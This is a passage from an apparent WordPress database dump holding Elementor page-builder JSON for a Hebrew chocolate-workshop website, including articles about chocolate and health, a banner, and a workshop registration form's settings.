\\u05e7\\u05dc\\u05d5\\u05e8\\u05d9\\u05d5\\u05ea, \\u05d5\\u05d1\\u05db\\u05da \\u05dc\\u05e1\\u05e4\\u05e7 \\u05d0\\u05ea \\u05d4\\u05ea\\u05e9\\u05d5\\u05e7\\u05d4 \\u05dc\\u05de\\u05e9\\u05d4\\u05d5 \\u05de\\u05ea\\u05d5\\u05e7, \\u05de\\u05d1\\u05dc\\u05d9 \\u05dc\\u05e1\\u05db\\u05df \\u05d0\\u05ea \\u05d4\\u05d1\\u05e8\\u05d9\\u05d0\\u05d5\\u05ea \\u05d0\\u05d5 \\u05dc\\u05d4\\u05d5\\u05e1\\u05d9\\u05e3 \\u05dc\\u05de\\u05e9\\u05e7\\u05dc.<\\/p><h2><strong>\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05de\\u05db\\u05e8<\\/strong><\\/h2><p>\\u05e0\\u05db\\u05d5\\u05df. \\u05d0\\u05d1\\u05dc \\u05d1\\u05d0\\u05d5\\u05ea\\u05d4 \\u05de\\u05d9\\u05d3\\u05d4 \\u05d2\\u05dd \\u05d0\\u05e4\\u05e8\\u05e1\\u05e7\\u05d9\\u05dd, \\u05dc\\u05de\\u05e9\\u05dc, \\u05d9\\u05db\\u05d5\\u05dc\\u05d9\\u05dd \\u05dc\\u05d4\\u05d5\\u05d1\\u05d9\\u05dc \\u05dc\\u05d4\\u05ea\\u05de\\u05db\\u05e8\\u05d5\\u05ea \\u05d0\\u05dd \\u05dc\\u05d0 \\u05de\\u05e4\\u05e1\\u05d9\\u05e7\\u05d9\\u05dd \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05d0\\u05d5\\u05ea\\u05dd. \\u05dc\\u05db\\u05df \\u05d7\\u05e9\\u05d5\\u05d1 \\u05dc\\u05d4\\u05d1\\u05d9\\u05df \\u05d0\\u05ea \\u05d4\\u05d2\\u05d9\\u05e8\\u05d5\\u05d9\\u05d9\\u05dd \\u05d4\\u05de\\u05d5\\u05d1\\u05d9\\u05dc\\u05d9\\u05dd \\u05dc\\u05d4\\u05ea\\u05de\\u05db\\u05e8\\u05d5\\u05ea. \\u05d4\\u05e8\\u05d2\\u05e9\\u05d5\\u05ea \\u05dc\\u05d2\\u05d1\\u05d9 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05dd \\u05d4\\u05de\\u05db\\u05ea\\u05d9\\u05d1\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05d4\\u05ea\\u05e0\\u05d4\\u05d2\\u05d5\\u05ea, \\u05d4\\u05de\\u05d5\\u05d1\\u05d9\\u05dc\\u05d4 \\u05dc\\u05d7\\u05e9\\u05d9\\u05d1\\u05d4 \\u05d4\\u05de\\u05e7\\u05e9\\u05e8\\u05ea \\u05d0\\u05db\\u05d9\\u05dc\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e2\\u05dd \\u05ea\\u05d7\\u05d5\\u05e9\\u05ea \\u05e0\\u05d5\\u05d7\\u05d5\\u05ea, \\u05ea\\u05d2\\u05de\\u05d5\\u05dc \\u05d5\\u05d7\\u05d2\\u05d9\\u05d2\\u05d4.<\\/p><p>\\u05d4\\u05e7\\u05e9\\u05e8 \\u05d4\\u05d6\\u05d4 \\u05de\\u05db\\u05ea\\u05d9\\u05d1 \\u05d0\\u05ea \\u05d4\\\"\\u05e6\\u05d5\\u05e8\\u05da\\\" \\u05d1\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05de\\u05d4 \\u05e9\\u05e2\\u05dc\\u05d5\\u05dc \\u05dc\\u05d4\\u05e7\\u05e9\\u05d5\\u05ea \\u05e2\\u05dc \\u05d4\\u05e9\\u05dc\\u05d9\\u05d8\\u05d4 \\u05d1\\u05db\\u05de\\u05d5\\u05d9\\u05d5\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e9\\u05d0\\u05ea\\u05dd \\u05d0\\u05d5\\u05db\\u05dc\\u05d9\\u05dd.<\\/p><h2><strong>\\u05e9\\u05d5\\u05e7\\u05d5 \\u05d7\\u05dd \\u05dc\\u05d0 \\u05e0\\u05d7\\u05e9\\u05d1<\\/strong><\\/h2><p>\\u05d0\\u05d1\\u05e7\\u05ea \\u05e7\\u05e7\\u05d0\\u05d5 \\u05d4\\u05de\\u05e9\\u05de\\u05e9\\u05ea \\u05dc\\u05d4\\u05db\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d7\\u05dd \\u05de\\u05db\\u05d9\\u05dc\\u05d4 \\u05e4\\u05d7\\u05d5\\u05ea \\u05e9\\u05d5\\u05de\\u05df, \\u05db\\u05d9 \\u05d0\\u05d9\\u05e0\\u05d4 \\u05db\\u05d5\\u05dc\\u05dc\\u05ea \\u05d7\\u05de\\u05d0\\u05ea \\u05e7\\u05e7\\u05d0\\u05d5 \\u05d5\\u05e9\\u05d5\\u05de\\u05e0\\u05d9\\u05dd \\u05d0\\u05d7\\u05e8\\u05d9\\u05dd \\u05e9\\u05e0\\u05de\\u05e6\\u05d0\\u05d9\\u05dd \\u05d1\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3.<\\/p><p>\\u05d0\\u05dc\\u05d0 \\u05e9\\u05d7\\u05e9\\u05d5\\u05d1 \\u05dc\\u05ea\\u05ea \\u05d0\\u05ea \\u05d4\\u05d3\\u05e2\\u05ea \\u05d2\\u05dd \\u05e2\\u05dc \\u05de\\u05d4 \\u05e9\\u05de\\u05d5\\u05e1\\u05d9\\u05e4\\u05d9\\u05dd \\u05dc\\u05de\\u05e9\\u05e7\\u05d4 \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5 \\u05d4\\u05d7\\u05dd. \\u05db\\u05da, \\u05dc\\u05de\\u05e9\\u05dc, \\u05d0\\u05dd \\u05de\\u05d5\\u05e1\\u05d9\\u05e4\\u05d9\\u05dd \\u05dc\\u05d5 \\u05e1\\u05d5\\u05db\\u05e8, \\u05e7\\u05e6\\u05e4\\u05ea \\u05d5\\u05e2\\u05d5\\u05d3 \\u05e7\\u05e6\\u05ea \\u05e4\\u05d9\\u05e8\\u05d5\\u05e8\\u05d9 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05dc\\u05de\\u05e2\\u05dc\\u05d4, \\u05d1\\u05e9\\u05d1\\u05d9\\u05dc \\u05d4\\u05d8\\u05e2\\u05dd, \\u05de\\u05e7\\u05d1\\u05dc\\u05d9\\u05dd \\u05de\\u05e9\\u05e7\\u05d4 \\u05e2\\u05ea\\u05d9\\u05e8 \\u05e7\\u05dc\\u05d5\\u05e8\\u05d9\\u05d5\\u05ea. \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05d0\\u05dd \\u05e9\\u05d5\\u05ea\\u05d9\\u05dd \\u05d0\\u05d5\\u05ea\\u05d5 \\u05e2\\u05dd \\u05db\\u05de\\u05d4 \\u05e2\\u05d5\\u05d2\\u05d9\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e7\\u05d8\\u05e0\\u05d5\\u05ea \\u05dc\\u05d9\\u05d3.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(912,186,'_elementor_version','0.4'),(913,186,'_thumbnail_id','177'),(919,188,'_wp_page_template','elementor_canvas'),(920,188,'_elementor_edit_mode','builder'),(921,188,'_elementor_template_type','post'),(922,188,'_elementor_data','[{\"id\":\"3d7689b8\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":180},\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"height\":\"min-height\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"custom_height_mobile\":{\"unit\":\"px\",\"size\":80},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"custom_height_tablet\":{\"unit\":\"px\",\"size\":124}},\"elements\":[{\"id\":\"570504a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_mobile\":30,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"4fadbe7\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"},\"width\":{\"unit\":\"px\",\"size\":120},\"width_mobile\":{\"unit\":\"px\",\"size\":80},\"align_mobile\":\"left\",\"image\":{\"id\":\"38\",\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/placeholder.png\"},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"376ec0e9\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#e8e8e8\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"gap\":\"no\",\"background_color_b\":\"#f4f4f4\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false},\"sticky\":\"top\"},\"elements\":[{\"id\":\"2a6711cf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size_mobile\":100},\"elements\":[{\"id\":\"66f452c6\",\"elType\":\"widget\",\"settings\":{\"align_items\":\"justify\",\"animation_line\":\"grow\",\"animation_text\":\"none\",\"color_menu_item\":\"#7a7a7a\",\"color_menu_item_hover\":\"#ffffff\",\"pointer_color_menu_item_hover\":\"#692910\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"pointer_width\":{\"unit\":\"px\",\"size\":3},\"color_dropdown_item\":\"#000000\",\"background_color_dropdown_item\":\"#f2f2f2\",\"color_dropdown_item_hover\":\"#02d3c9\",\"background_color_dropdown_item_hover\":\"#ededed\",\"dropdown_typography_typography\":\"custom\",\"dropdown_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"toggle_color\":\"#02d3c9\",\"toggle_color_hover\":\"#54595f\",\"toggle_size\":{\"unit\":\"px\",\"size\":30},\"toggle_border_width\":{\"unit\":\"px\",\"size\":0},\"toggle_border_radius\":{\"unit\":\"px\",\"size\":0},\"pointer\":\"background\",\"menu_typography_text_transform\":\"uppercase\",\"dropdown\":\"mobile\",\"full_width\":\"stretch\",\"color_menu_item_active\":\"#ffffff\",\"animation_background\":\"sweep-down\",\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":18},\"toggle_background_color\":\"rgba(0,0,0,0)\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7e94e72f\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"height\":\"min-height\",\"custom_height\":{\"unit\":\"vh\",\"size\":\"60\"},\"column_position\":\"stretch\",\"background_background\":\"classic\",\"background_image\":{\"id\":35,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/HDR.jpg\"},\"background_position\":\"center center\",\"background_size\":\"cover\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"25\",\"bottom\":\"40\",\"left\":\"25\",\"isLinked\":false}},\"elements\":[{\"id\":\"3b866986\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"rgba(255,255,255,0.73)\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"63\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"53\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c8a61fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":33,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/logoup.png\"},\"space\":{\"unit\":\"%\",\"size\":18},\"_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"_background_background\":\"classic\",\"_background_color\":\"#f1d5ad\",\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"1f909fe7\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d8\\u05e2\\u05d5\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d0\\u05d9\\u05db\\u05d5\\u05ea\\u05d9 \\u05d1\\u05d9\\u05d5\\u05dd \\u05d0\\u05d7\\u05d3 \\u05d8\\u05e2\\u05d9\\u05dd \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#40272c\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"45\"},\"typography_font_weight\":\"100\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"0.9\"},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"38\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"35\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false},\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"35481412\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4\",\"align\":\"center\",\"title_color\":\"#40272c\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"22\"},\"typography_font_weight\":\"bold\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"20\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"18\"},\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"41e0dd23\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"_id\":\"eovd5tr\",\"required\":\"true\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"eovd5tr\"},{\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"_id\":\"68frv7y\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"68frv7y\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"width\":\"100\",\"_id\":\"p0rl9g7\",\"required\":\"\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"p0rl9g7\"}],\"show_labels\":\"\",\"button_text\":\"\\u05d2\\u05dd \\u05d0\\u05e0\\u05d9 \\u05e8\\u05d5\\u05e6\\u05d4 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4!\",\"success_message\":\"The message was sent successfully!\",\"error_message\":\"There\'s something wrong... Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong... The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":\"10\"},\"row_gap\":{\"unit\":\"px\",\"size\":\"15\"},\"field_text_color\":\"#54595f\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_typography_typography\":\"custom\",\"button_typography_font_weight\":\"bold\",\"button_typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"3\"},\"button_background_color\":\"#5c0011\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":false},\"field_typography_typography\":\"custom\",\"field_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"13\"},\"button_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"14\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"22\",\"bottom\":\"22\",\"left\":\"22\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"button_background_hover_color\":\"#40272c\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"label_typography_typography\":\"custom\",\"label_typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4f74ca63\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#e3e0dd\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"20\",\"bottom\":\"70\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"655473aa\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"55.702\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"12\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"13679594\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e2\\u05dd \\u05d7\\u05d1\\u05e8\\u05d9\\u05dd\",\"align\":\"right\",\"title_color\":\"#40272c\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"35\"},\"typography_font_family\":\"Open Sans Hebrew\",\"typography_font_weight\":\"100\",\"typography_text_transform\":\"capitalize\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"align_mobile\":\"center\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"31\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"30\"},\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"66f30f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05db\\u05d5\\u05dc\\u05e0\\u05d5 \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05e9\\u05d0\\u05d7\\u05e8\\u05d9, \\u05d7\\u05dc\\u05e7\\u05e0\\u05d5 \\u05d0\\u05e4\\u05d9\\u05dc\\u05d5 \\u05d0\\u05d5\\u05db\\u05dc\\u05d9\\u05dd \\u05e4\\u05d7\\u05d5\\u05ea \\u05d1\\u05d0\\u05e8\\u05d5\\u05d7\\u05ea \\u05d4\\u05e2\\u05e8\\u05d1 \\u05e8\\u05e7 \\u05db\\u05d3\\u05d9 \\u05e9\\u05e0\\u05d5\\u05db\\u05dc \\u05dc\\u05e0\\u05e6\\u05dc \\u05d0\\u05ea \\u05ea\\u05e4\\u05e8\\u05d9\\u05d8 \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e2\\u05d3 \\u05ea\\u05d5\\u05de\\u05d5, \\u05d0\\u05d6 \\u05dc\\u05de\\u05d4 \\u05e9\\u05dc\\u05d0 \\u05e0\\u05e2\\u05e9\\u05d4 \\u05d9\\u05d5\\u05dd \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd?<\\/p><p>\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e0\\u05d5\\u05e6\\u05e8\\u05d5 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05dc\\u05e8\\u05d2\\u05e2\\u05d9\\u05dd \\u05d4\\u05d0\\u05dc\\u05d4, \\u05e9\\u05e0\\u05d5\\u05db\\u05dc \\u05dc\\u05d4\\u05d2\\u05d9\\u05e2 \\\"\\u05db\\u05de\\u05e2\\u05d8 \\u05e9\\u05d1\\u05e2\\u05d9\\u05dd\\\" \\u05d5\\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05de\\u05d2\\u05d5\\u05d5\\u05df \\u05de\\u05d0\\u05db\\u05dc\\u05d9\\u05dd \\u05d8\\u05e2\\u05d9\\u05de\\u05d9\\u05dd \\u05e9\\u05e1\\u05d5\\u05d1\\u05d1\\u05d9\\u05dd \\u05e1\\u05d1\\u05d9\\u05d1 \\u05d4\\u05d0\\u05d5\\u05db\\u05dc \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05d4\\u05d0\\u05d4\\u05d5\\u05d1 \\u05e2\\u05dc \\u05db\\u05d5\\u05dc\\u05e0\\u05d5, \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3. \\u05d4\\u05d7\\u05dc \\u05de\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e8\\u05d9\\u05e8 \\u05d5\\u05e2\\u05d3 \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e0\\u05d5\\u05d6\\u05dc, \\u05d4\\u05db\\u05dc \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d9\\u05d5\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9 \\u05dc\\u05de\\u05d3\\u05d9 \\u05d1\\u05db\\u05dc \\u05e6\\u05d5\\u05e8\\u05d4 \\u05d5\\u05e6\\u05d1\\u05e2, \\u05db\\u05dc \\u05d3\\u05e8\\u05da \\u05d5\\u05e9\\u05e2\\u05d4.\\u00a0<\\/p>\",\"text_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19},\"typography_font_family\":\"Open Sans Hebrew\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"1.6\"},\"align_mobile\":\"center\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"14\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"17\"},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"15f91cbb\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"44.298\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_position\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"385ae28\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/inner-hp.jpg\",\"id\":26}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4477cb\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"padding\":{\"unit\":